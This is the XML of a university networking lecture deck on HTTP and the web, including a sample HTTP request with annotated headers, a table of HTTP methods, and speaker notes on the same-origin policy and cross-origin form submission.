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81"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId82"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="388" r:id="rId2"/>
    <p:sldId id="529" r:id="rId3"/>
    <p:sldId id="353" r:id="rId4"/>
    <p:sldId id="258" r:id="rId5"/>
    <p:sldId id="337" r:id="rId6"/>
    <p:sldId id="336" r:id="rId7"/>
    <p:sldId id="338" r:id="rId8"/>
    <p:sldId id="339" r:id="rId9"/>
    <p:sldId id="502" r:id="rId10"/>
    <p:sldId id="289" r:id="rId11"/>
    <p:sldId id="265" r:id="rId12"/>
    <p:sldId id="291" r:id="rId13"/>
    <p:sldId id="503" r:id="rId14"/>
    <p:sldId id="356" r:id="rId15"/>
    <p:sldId id="506" r:id="rId16"/>
    <p:sldId id="507" r:id="rId17"/>
    <p:sldId id="508" r:id="rId18"/>
    <p:sldId id="510" r:id="rId19"/>
    <p:sldId id="512" r:id="rId20"/>
    <p:sldId id="511" r:id="rId21"/>
    <p:sldId id="504" r:id="rId22"/>
    <p:sldId id="369" r:id="rId23"/>
    <p:sldId id="370" r:id="rId24"/>
    <p:sldId id="505" r:id="rId25"/>
    <p:sldId id="286" r:id="rId26"/>
    <p:sldId id="280" r:id="rId27"/>
    <p:sldId id="345" r:id="rId28"/>
    <p:sldId id="362" r:id="rId29"/>
    <p:sldId id="368" r:id="rId30"/>
    <p:sldId id="287" r:id="rId31"/>
    <p:sldId id="288" r:id="rId32"/>
    <p:sldId id="532" r:id="rId33"/>
    <p:sldId id="372" r:id="rId34"/>
    <p:sldId id="373" r:id="rId35"/>
    <p:sldId id="374" r:id="rId36"/>
    <p:sldId id="375" r:id="rId37"/>
    <p:sldId id="376" r:id="rId38"/>
    <p:sldId id="377" r:id="rId39"/>
    <p:sldId id="378" r:id="rId40"/>
    <p:sldId id="418" r:id="rId41"/>
    <p:sldId id="419" r:id="rId42"/>
    <p:sldId id="420" r:id="rId43"/>
    <p:sldId id="417" r:id="rId44"/>
    <p:sldId id="379" r:id="rId45"/>
    <p:sldId id="381" r:id="rId46"/>
    <p:sldId id="382" r:id="rId47"/>
    <p:sldId id="383" r:id="rId48"/>
    <p:sldId id="384" r:id="rId49"/>
    <p:sldId id="385" r:id="rId50"/>
    <p:sldId id="386" r:id="rId51"/>
    <p:sldId id="387" r:id="rId52"/>
    <p:sldId id="530" r:id="rId53"/>
    <p:sldId id="391" r:id="rId54"/>
    <p:sldId id="392" r:id="rId55"/>
    <p:sldId id="406" r:id="rId56"/>
    <p:sldId id="407" r:id="rId57"/>
    <p:sldId id="408" r:id="rId58"/>
    <p:sldId id="409" r:id="rId59"/>
    <p:sldId id="411" r:id="rId60"/>
    <p:sldId id="412" r:id="rId61"/>
    <p:sldId id="413" r:id="rId62"/>
    <p:sldId id="414" r:id="rId63"/>
    <p:sldId id="415" r:id="rId64"/>
    <p:sldId id="513" r:id="rId65"/>
    <p:sldId id="515" r:id="rId66"/>
    <p:sldId id="516" r:id="rId67"/>
    <p:sldId id="517" r:id="rId68"/>
    <p:sldId id="518" r:id="rId69"/>
    <p:sldId id="519" r:id="rId70"/>
    <p:sldId id="520" r:id="rId71"/>
    <p:sldId id="521" r:id="rId72"/>
    <p:sldId id="522" r:id="rId73"/>
    <p:sldId id="531" r:id="rId74"/>
    <p:sldId id="523" r:id="rId75"/>
    <p:sldId id="524" r:id="rId76"/>
    <p:sldId id="525" r:id="rId77"/>
    <p:sldId id="528" r:id="rId78"/>
    <p:sldId id="526" r:id="rId79"/>
    <p:sldId id="527" r:id="rId80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206C271-A17B-4745-8409-D19C184D271D}">
          <p14:sldIdLst>
            <p14:sldId id="388"/>
            <p14:sldId id="529"/>
            <p14:sldId id="353"/>
            <p14:sldId id="258"/>
            <p14:sldId id="337"/>
            <p14:sldId id="336"/>
            <p14:sldId id="338"/>
            <p14:sldId id="339"/>
            <p14:sldId id="502"/>
            <p14:sldId id="289"/>
            <p14:sldId id="265"/>
            <p14:sldId id="291"/>
            <p14:sldId id="503"/>
            <p14:sldId id="356"/>
            <p14:sldId id="506"/>
            <p14:sldId id="507"/>
            <p14:sldId id="508"/>
            <p14:sldId id="510"/>
            <p14:sldId id="512"/>
            <p14:sldId id="511"/>
            <p14:sldId id="504"/>
            <p14:sldId id="369"/>
            <p14:sldId id="370"/>
            <p14:sldId id="505"/>
            <p14:sldId id="286"/>
            <p14:sldId id="280"/>
            <p14:sldId id="345"/>
            <p14:sldId id="362"/>
            <p14:sldId id="368"/>
            <p14:sldId id="287"/>
            <p14:sldId id="288"/>
            <p14:sldId id="532"/>
            <p14:sldId id="372"/>
            <p14:sldId id="373"/>
            <p14:sldId id="374"/>
            <p14:sldId id="375"/>
            <p14:sldId id="376"/>
            <p14:sldId id="377"/>
            <p14:sldId id="378"/>
            <p14:sldId id="418"/>
            <p14:sldId id="419"/>
            <p14:sldId id="420"/>
            <p14:sldId id="417"/>
            <p14:sldId id="379"/>
            <p14:sldId id="381"/>
            <p14:sldId id="382"/>
            <p14:sldId id="383"/>
            <p14:sldId id="384"/>
            <p14:sldId id="385"/>
            <p14:sldId id="386"/>
            <p14:sldId id="387"/>
            <p14:sldId id="530"/>
            <p14:sldId id="391"/>
            <p14:sldId id="392"/>
            <p14:sldId id="406"/>
            <p14:sldId id="407"/>
            <p14:sldId id="408"/>
            <p14:sldId id="409"/>
            <p14:sldId id="411"/>
            <p14:sldId id="412"/>
            <p14:sldId id="413"/>
            <p14:sldId id="414"/>
            <p14:sldId id="415"/>
            <p14:sldId id="513"/>
            <p14:sldId id="515"/>
            <p14:sldId id="516"/>
            <p14:sldId id="517"/>
            <p14:sldId id="518"/>
            <p14:sldId id="519"/>
            <p14:sldId id="520"/>
            <p14:sldId id="521"/>
            <p14:sldId id="522"/>
            <p14:sldId id="531"/>
            <p14:sldId id="523"/>
            <p14:sldId id="524"/>
            <p14:sldId id="525"/>
            <p14:sldId id="528"/>
            <p14:sldId id="526"/>
            <p14:sldId id="5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19" autoAdjust="0"/>
    <p:restoredTop sz="89607" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="82" d="100"/>
          <a:sy n="82" d="100"/>
        </p:scale>
        <p:origin x="80" y="2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81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4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microsoft.com/office/2016/11/relationships/changesInfo" Target="changesInfos/changesInfo1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son, Alden" userId="S::awjacks@northeastern.edu::057f6ed4-5b0d-4701-ad80-193f163f4b8a" providerId="AD" clId="Web-{AD4B278F-949E-13E3-3C4D-4AD89A1F7749}"/>
    <pc:docChg chg="addSld modSld sldOrd modSection">
      <pc:chgData name="Jackson, Alden" userId="S::awjacks@northeastern.edu::057f6ed4-5b0d-4701-ad80-193f163f4b8a" providerId="AD" clId="Web-{AD4B278F-949E-13E3-3C4D-4AD89A1F7749}" dt="2019-01-10T19:33:14.953" v="163" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp add ord">
        <pc:chgData name="Jackson, Alden" userId="S::awjacks@northeastern.edu::057f6ed4-5b0d-4701-ad80-193f163f4b8a" providerId="AD" clId="Web-{AD4B278F-949E-13E3-3C4D-4AD89A1F7749}" dt="2019-01-10T19:33:10.687" v="161" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3140473184" sldId="422"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Jackson, Alden" userId="S::awjacks@northeastern.edu::057f6ed4-5b0d-4701-ad80-193f163f4b8a" providerId="AD" clId="Web-{AD4B278F-949E-13E3-3C4D-4AD89A1F7749}" dt="2019-01-10T19:27:13.202" v="30" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3140473184" sldId="422"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Jackson, Alden" userId="S::awjacks@northeastern.edu::057f6ed4-5b0d-4701-ad80-193f163f4b8a" providerId="AD" clId="Web-{AD4B278F-949E-13E3-3C4D-4AD89A1F7749}" dt="2019-01-10T19:33:10.687" v="161" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3140473184" sldId="422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tsparker.com/whitepaper-same-origin-policy/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Introduced by Netscape engineers in 1995 along with the Document Object Model (DOM) and the ability of JS to query it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Nice WP on SOP: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.netsparker.com/whitepaper-same-origin-policy/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51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10" name="Shape 41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XHR introduced by Microsoft in IE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="319892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Forms are not covered by SOP.  Can submit forms from a domain that is NOT the source domain.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>This is so broken!  WHY is it allowed?  Don't know. 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92AC4-46E6-48DF-9C15-A91B135037C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53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PLT: page load time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36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625056" indent="-312528"/>
            <a:lvl3pPr marL="937584" indent="-312528"/>
            <a:lvl4pPr marL="1250112" indent="-312528"/>
            <a:lvl5pPr marL="1562640" indent="-312528"/>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Body Level One</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Body Level Two</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Body Level Three</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Body Level Four</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/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304742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28600"/>
            <a:ext cx="117856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711200" cy="304800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17856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286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1828800" y="3048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572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03200" y="228600"/>
            <a:ext cx="117856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03200" y="1600200"/>
            <a:ext cx="117856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-6179" y="1257917"/>
            <a:ext cx="793579" cy="26072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800" b="1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search.com/search?q=Christo+Wilson" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.websearch.com/" TargetMode="Externa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iendly.com/" TargetMode="Externa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friendly.com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://www.bofw.com/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s://google.com/search?q=whatever" TargetMode="Externa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://int.cia.gov/projects/hitlist.html" TargetMode="Externa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0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143000"/>
            <a:ext cx="9452113" cy="1828800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="6000" cap="none" dirty="0"/>
              <a:t>CS 3700</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="6000" cap="none" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="4900" cap="none" dirty="0"/>
              <a:t>Networks and Distributed Systems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09799" y="3496235"/>
            <a:ext cx="6662784" cy="21336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tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTP and The Web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Revised 03/12/2020</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3265509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D758B61-EF43-4466-B9AD-44C28DEA9E46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3493828" y="2083558"/>
            <a:ext cx="0" cy="4640239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ACD054E-657B-4998-AA03-CB9AAF7E2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Request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24184-0038-4394-B534-60E0F5CE0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2191" y="2429301"/>
            <a:ext cx="8397922" cy="4239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GET /index.html HTTP/1.1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Host: www.reddit.com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Connection: keep-alive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Accept: text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>html,application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xhtml+xml</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/65.0.3325.51 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Accept-Encoding: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>gzip,deflate,sdch</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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Accept-Language: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>en-US,en;q</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=0.8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: www.google.com/search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364D5B5-7563-4F9D-8D72-C13A561D6D8B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2383809"/>
            <a:ext cx="3484729" cy="3457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056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7584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112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2640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000" dirty="0"/>
              <a:t>Method, resource, and version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6F52C95-E8AC-4188-A9CC-A38FCE89AE6C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="2736376"/>
            <a:ext cx="3484729" cy="3457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056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7584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112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2640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000" dirty="0"/>
              <a:t>Contacted domain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C37AEE1-94CB-49E5-B569-6E95DA5FA7AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2" y="3088943"/>
            <a:ext cx="3484729" cy="3457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056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7584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112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2640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000" dirty="0"/>
              <a:t>Connection type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0DEBC3B-0494-444E-A0BC-06344BEE90F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-3" y="3441510"/>
            <a:ext cx="3484729" cy="3457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056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7584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112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2640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000" dirty="0"/>
              <a:t>Accepted file types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E4FF9BF-4EEE-4F91-BD56-10DB70285F27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-4" y="3794077"/>
            <a:ext cx="3484729" cy="3457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056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7584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112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2640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000" dirty="0"/>
              <a:t>Your browser and OS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5812494-9C39-4B23-AD77-382C00E2875E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5" y="4146644"/>
            <a:ext cx="3484729" cy="3457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056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7584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112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2640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000" dirty="0"/>
              <a:t>Compressed responses?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CAF1458-FABD-4CAF-904E-A0FCEEF5B727}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4499211"/>
            <a:ext cx="3484729" cy="3457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056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7584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112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2640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000" dirty="0"/>
              <a:t>Your preferred language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950D18C-371A-4560-82E6-12E97E20B469}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-6" y="4851779"/>
            <a:ext cx="3484729" cy="3457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056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7584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112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2640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000" dirty="0"/>
              <a:t>Previous site you were browsing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CE0F1D-100E-49E2-96C1-824866552179}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="145576" y="2329218"/>
            <a:ext cx="6496334" cy="435094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AB14AC-FD10-4EFC-A6AF-CB83B213F857}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="145576" y="2673504"/>
            <a:ext cx="6496334" cy="435094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013513-1862-4720-8E43-57001A900DA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="145576" y="2980257"/>
            <a:ext cx="6496334" cy="435094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A0D402-6E2B-418F-B8FD-6148B88465BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="145576" y="3366697"/>
            <a:ext cx="8179558" cy="435094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D32AC3-104D-4952-ABBA-D821B9D30FD0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="145576" y="3691967"/>
            <a:ext cx="11900848" cy="435094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381139-CC8D-435D-89CD-7BCC009F026C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="141027" y="4037071"/>
            <a:ext cx="7638197" cy="435094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8A1BFC4-7496-4DA3-93D2-A7C9910BE324}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="145576" y="4396462"/>
            <a:ext cx="7638197" cy="435094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8A5AE7-C233-44C3-BA3C-AA0BEABA0F9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="141027" y="4755604"/>
            <a:ext cx="7638197" cy="435094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201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xfrm>
            <a:off x="838200" y="143069"/>
            <a:ext cx="10515600" cy="120053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 dirty="0"/>
              <a:t>HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4500" dirty="0"/>
              <a:t>Request </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4500" dirty="0"/>
              <a:t>Methods</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="102" name="Table 102"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2652664" y="1579478"/>
          <a:ext cx="7961789" cy="4952534"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1">
                <a:tableStyleId>{69CF1AB2-1976-4502-BF36-3FF5EA218861}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1488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2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188"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>
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Verb</a:t>
                      </a:r>
                      <a:endParaRPr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35719" marR="35719" marT="35719" marB="35719"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>
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Description</a:t>
                      </a:r>
                      <a:endParaRPr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35719" marR="35719" marT="35719" marB="35719" anchor="ctr" horzOverflow="overflow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259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/>
                        <a:t>GET</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800" b="1">
                        <a:latin typeface="Helvetica"/>
                        <a:ea typeface="Helvetica"/>
                        <a:cs typeface="Helvetica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Retrieve resource at a given path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034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lang="en-US" sz="1800" dirty="0"/>
                        <a:t>POST</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800" b="1" dirty="0">
                        <a:latin typeface="Helvetica"/>
                        <a:ea typeface="Helvetica"/>
                        <a:cs typeface="Helvetica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800" dirty="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>Submit data to a given path, might create resources as new paths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5992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lang="en-US" sz="1800" dirty="0"/>
                        <a:t>HEAD</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800" b="1" dirty="0">
                        <a:latin typeface="Helvetica"/>
                        <a:ea typeface="Helvetica"/>
                        <a:cs typeface="Helvetica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lang="en-US" sz="1800" dirty="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>Identical to a GET, but response omits body</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800" dirty="0">
                        <a:sym typeface="Helvetica Light"/>
                      </a:endParaRP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6617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/>
                        <a:t>PUT</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800" b="1">
                        <a:latin typeface="Helvetica"/>
                        <a:ea typeface="Helvetica"/>
                        <a:cs typeface="Helvetica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Submit data to a given path, creating resource if it exists or modifying existing resource at that path</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800" i="1">
                        <a:sym typeface="Helvetica Light"/>
                      </a:endParaRP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/>
                        <a:t>DELETE</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800" b="1">
                        <a:latin typeface="Helvetica"/>
                        <a:ea typeface="Helvetica"/>
                        <a:cs typeface="Helvetica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Deletes resource at a given path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/>
                        <a:t>TRACE</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800" b="1">
                        <a:latin typeface="Helvetica"/>
                        <a:ea typeface="Helvetica"/>
                        <a:cs typeface="Helvetica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Echoes request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1034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/>
                        <a:t>OPTIONS</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800" b="1">
                        <a:latin typeface="Helvetica"/>
                        <a:ea typeface="Helvetica"/>
                        <a:cs typeface="Helvetica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Returns supported HTTP methods given a path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1034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/>
                        <a:t>CONNECT</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800" b="1">
                        <a:latin typeface="Helvetica"/>
                        <a:ea typeface="Helvetica"/>
                        <a:cs typeface="Helvetica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 dirty="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>Creates a tunnel to a given network location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EDC9AB6A-8C51-4D09-AA71-CA54060296CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="291153" y="1937982"/>
            <a:ext cx="2265528" cy="1028131"/>
            <a:chOff x="291153" y="1937982"/>
            <a:chExt cx="2265528" cy="1028131"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="Left Brace 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC02121D-9914-4D7E-9042-7FAF64AF6B8A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2374710" y="1937982"/>
              <a:ext cx="181971" cy="1028131"/>
            </a:xfrm>
            <a:prstGeom prst="leftBrac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peech Bubble: Rectangle 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D050927D-A3D7-4C78-B3C2-D009D06646BC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="291153" y="1937982"/>
              <a:ext cx="1628633" cy="900752"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 60173"/>
                <a:gd name="adj2" fmla="val 997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99.9% of all HTTP requests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83E6895-3632-43EA-ACBD-AF4CF9BBD102}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="291152" y="3027614"/>
            <a:ext cx="2265529" cy="2895514"/>
            <a:chOff x="291152" y="3027614"/>
            <a:chExt cx="2265529" cy="2895514"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Left Brace 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9AC1DF1C-4CEC-4393-9951-03EE3C9D6C1E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2374710" y="3027614"/>
              <a:ext cx="181971" cy="2895514"/>
            </a:xfrm>
            <a:prstGeom prst="leftBrac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peech Bubble: Rectangle 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{278495F2-CB8C-42CD-B0B1-165B6FD936EB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="291152" y="3910084"/>
              <a:ext cx="1628633" cy="900752"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 60173"/>
                <a:gd name="adj2" fmla="val 997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Rarely used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72D007-E415-4A42-BF42-06358ECDC0BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="291152" y="5814179"/>
            <a:ext cx="2265529" cy="900752"/>
            <a:chOff x="291152" y="5814179"/>
            <a:chExt cx="2265529" cy="900752"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Left Brace 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9246A8B3-291E-41E1-B0A1-211CDB4E4C86}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
